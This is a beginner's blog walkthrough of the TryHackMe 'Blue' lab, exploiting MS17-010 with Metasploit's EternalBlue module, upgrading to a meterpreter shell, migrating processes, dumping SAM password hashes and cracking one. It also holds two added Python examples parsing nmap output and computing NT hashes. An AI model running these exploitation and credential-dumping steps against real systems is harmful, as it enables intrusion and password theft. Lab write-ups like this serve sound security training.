It has been another long break, but I am back to writing, which I genuinely enjoy. In this post I will take you through the steps I performed to complete the Blue room on TryHackMe. THM describes the room as follows: “this is an educational series for complete beginners. Professionals will likely get very little out of this room beyond basic practice as the process here is meant to be beginner-focused.“
Step 1: Deploy the target machine and connect to the VPN network to access it.

Step 2: Activity Questions
Q1: Scan the machine. (If you are unsure how to tackle this, I recommend checking out the room RP: Nmap)
I performed an nmap scan against the target machine: nmap -sV -Pn 10.10.236.183

Q2: How many ports are open with a port number under 1000?
From the scan output in the screenshot above, there are 3 open ports under 1000, i.e. 135, 139 and 445.
Q3: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
To identify whether a detected service is running a vulnerable version, I used the nmap vulnerability scripts: nmap --script vuln -Pn 10.10.236.183. The script output reported the host as vulnerable under smb-vuln-ms17-010 (i.e. MS17-010).
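As an added example (not code from the original post), here is a small Python parser for nmap's normal text output that answers Q2 and Q3 mechanically from a saved scan: it lists the open ports below 1000 and reports which vuln scripts ended with State: VULNERABLE. The scan text is a constructed, abridged sample modelled on the layout of nmap -sV --script vuln output for the target above, not the author's screenshot; the port numbers and script name follow the post. On the defensive side the same parser turns a scan of your own hosts into an exposure list that can be tracked until the patch is applied.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample modelled on nmap's normal output layout for an
# "nmap -sV --script vuln" run; abridged, and not the author's real scan.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.236.183
Host is up (0.045s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows 7 - 10 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     Risk factor: HIGH
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
"""

# "445/tcp   open  microsoft-ds  <version text>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# A script name sits directly after "| " or "|_"; indented lines are script body.
SCRIPT_RE = re.compile(r"^\|(?:_| )(?=\S)([A-Za-z0-9_.-]+):")
STATE_RE = re.compile(r"^\|\s+State:\s*(\S+)")


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_ports(text: str) -> List[PortEntry]:
    """Extract every port line from nmap normal output."""
    entries: List[PortEntry] = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            entries.append(PortEntry(int(m.group(1)), m.group(2), m.group(3),
                                     m.group(4), (m.group(5) or "").strip()))
    return entries


def open_ports_below(entries: List[PortEntry], limit: int = 1000) -> List[int]:
    """Open ports with a number under `limit` (the Q2 question)."""
    return sorted(e.port for e in entries if e.state == "open" and e.port < limit)


def parse_script_states(text: str) -> Dict[str, Optional[str]]:
    """Map each NSE script name to the 'State:' value it printed, if any."""
    states: Dict[str, Optional[str]] = {}
    current = None
    for line in text.splitlines():
        m = SCRIPT_RE.match(line)
        if m:
            current = m.group(1)
            states.setdefault(current, None)
            continue
        s = STATE_RE.match(line)
        if s and current:
            states[current] = s.group(1)
    return states


def vulnerable_scripts(text: str) -> List[str]:
    """Script names that reported State: VULNERABLE (the Q3 question)."""
    return sorted(n for n, st in parse_script_states(text).items() if st == "VULNERABLE")


if __name__ == "__main__":
    ports = parse_ports(SAMPLE_SCAN)
    print("open ports under 1000:", open_ports_below(ports))
    print("vulnerable per NSE:", vulnerable_scripts(SAMPLE_SCAN))
```

The state is taken only from lines inside a script block, so one-line results such as smb-vuln-ms10-054: false are recorded with no state rather than mistaken for a finding.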


Q4: Start Metasploit
msfconsole launches Metasploit on Kali Linux.

Q5: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
search ms17-010 lists the available modules in Metasploit. We are going to use exploit/windows/smb/ms17_010_eternalblue.

Q6: Show options and set the one required value. What is the name of this value? (All caps for submission)

use exploit/windows/smb/ms17_010_eternalblue selects the module. show options lists all available options. As per the screenshot above, there are 4 required parameters, but one of them has not been set: RHOSTS. The target IP address needs to be assigned to RHOSTS: set RHOSTS 10.10.236.183. Also, since we are on the VPN, we need to set another parameter, LHOST, to the IP address assigned to the VPN interface.

Q7. Run the exploit!

Q8. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
use post/multi/manage/shell_to_meterpreter will get us a meterpreter shell. We need to identify the session number with the sessions command, which lists the active sessions. The relevant session number is then set with set SESSION session# (1 in this case).

Q9. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)
From the screenshot above, SESSION is the option which needs to be assigned the relevant active session number.
Q10. Set the required option, you may need to list all of the sessions to find your target here.
As shown in the screenshot above, sessions lists all sessions, and set SESSION session# sets the option to the relevant session number.
Q11. Run! If this doesn’t work, try completing the exploit from the previous task once more.
run executes the module, and successful exploitation provides us with the meterpreter shell.
Q12. Once the meterpreter shell conversion completes, select that session for use.
sessions -i session# opens the session for interaction, i.e. the session converted from the initially exploited shell, where we did not have meterpreter.
Q13. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

Q14. List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Q15. Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
After several attempts, I wasn’t able to migrate to 3036 [TrustedInstaller.exe], hence I used 2688 [SearchIndexer.exe] for migrating the process.

Q16. Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
help in the meterpreter session lists all available commands. hashdump is one of them and is used to dump the contents of the SAM database. The Security Account Manager (SAM) is a database file that stores user account information. Jon is the non-default user as per the dumped SAM data.

Q17. Copy this password hash to a file and research how to crack it. What is the cracked password?
ffb43f0de35be4d9917ac0cc8ad57f8d is the dumped NTLM hash for user Jon. A simple online tool can be used to crack the hash value. The cracked value of the hash was *******.
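As an added illustration (not code from the original post, and not a cracking tool), the Python below shows why an online lookup can return the password behind a hashdump line so readily: the NT hash is MD4 over the UTF-16LE encoding of the password, with no salt and no work factor, so equal passwords give equal hashes and precomputed tables apply directly. It implements MD4 in pure Python (hashlib's md4 is often unavailable under OpenSSL 3), parses the user:rid:lmhash:nthash::: format that hashdump prints, and groups accounts that share a password. The svc_backup and helpdesk accounts, their RIDs and the password Winter2024! are constructed; Jon's line reuses the hash quoted above with a constructed RID.

```python
import struct
from typing import Dict, List

# Value hashdump shows in the LM field when LM hashing is disabled (the
# default on modern Windows): it carries no password material at all.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); used because hashlib's md4 may be missing."""
    mask = 0xFFFFFFFF

    def rotl(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z): return (x & y) | (~x & mask & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    # Padding: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    msg = bytearray(data)
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = [  # (boolean function, round constant, word order, shift amounts)
        (f, 0x00000000, list(range(16)), [3, 7, 11, 19]),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], [3, 5, 9, 13]),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], [3, 9, 11, 15]),
    ]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + func(b, c, d) + x[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers for the next step
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)). No salt, no iteration count."""
    return md4(password.encode("utf-16-le")).hex()


def is_nt_hash(value: str) -> bool:
    """hashdump NT fields are exactly 32 hex characters (16-byte MD4 digest)."""
    return len(value) == 32 and all(ch in "0123456789abcdef" for ch in value.lower())


def parse_hashdump_line(line: str) -> Dict[str, str]:
    """Split one 'user:rid:lmhash:nthash:::' line into its fields."""
    user, rid, lm, nt, *_ = line.strip().split(":")
    return {"user": user, "rid": rid, "lm": lm.lower(), "nt": nt.lower()}


def identical_password_groups(entries: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Accounts sharing an NT hash share a password; unsalted hashing exposes that."""
    groups: Dict[str, List[str]] = {}
    for e in entries:
        groups.setdefault(e["nt"], []).append(e["user"])
    return {nt: users for nt, users in groups.items() if len(users) > 1}


# Constructed hashdump sample: Jon's NT hash is the one quoted in the post
# (RID constructed); the other two accounts and their password are made up.
SAMPLE_HASHDUMP = [
    "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::",
    f"svc_backup:1001:{EMPTY_LM_HASH}:{nt_hash('Winter2024!')}:::",
    f"helpdesk:1002:{EMPTY_LM_HASH}:{nt_hash('Winter2024!')}:::",
]

if __name__ == "__main__":
    entries = [parse_hashdump_line(line) for line in SAMPLE_HASHDUMP]
    for e in entries:
        print(e["user"], "NT format ok:", is_nt_hash(e["nt"]), "LM disabled:", e["lm"] == EMPTY_LM_HASH)
    print("accounts sharing a password:", identical_password_groups(entries))
```

For the defender the useful observations are the LM field equalling the empty-LM constant (LM hashing is off, so no weak LM material is present) and NT hashes repeated across accounts; the only defences against table lookup are password length and keeping the SAM out of reach, which is what patching MS17-010 restores here.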

Q18. Flag1? (Only submit the flag contents {CONTENTS})
Use shell to switch from the meterpreter shell to a command prompt. Once we are in the command prompt, we can use dir flag* /s /p to find any file matching the pattern flag*. I ran the search after setting my present working directory to C:\. As per the screenshot below, the 3 flag files are:
- flag1.txt at C:\
- flag2.txt at C:\Windows\System32\config
- flag3.txt at C:\Users\Jon\Documents


Q19. Flag2? *Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.

Q20. flag3?

The above questions complete the Blue box. To summarise the activities, we started with nmap to identify open ports. We then used the nmap vulnerability scripts to check whether the open ports carried any known vulnerability. Once we knew that port 445 could be exploited with MS17-010, we turned to Metasploit to see whether a ready exploit module existed for it. We identified the vulnerability and exploited it. Post exploitation, we had to use another module to convert the obtained shell to meterpreter. After obtaining a meterpreter shell, the focus was on escalating privileges: process migration was used to gain elevated privileges, and then we went through the flag-finding approach.
I hope this simple tutorial helps you gain understanding and helps if you get stuck at any point.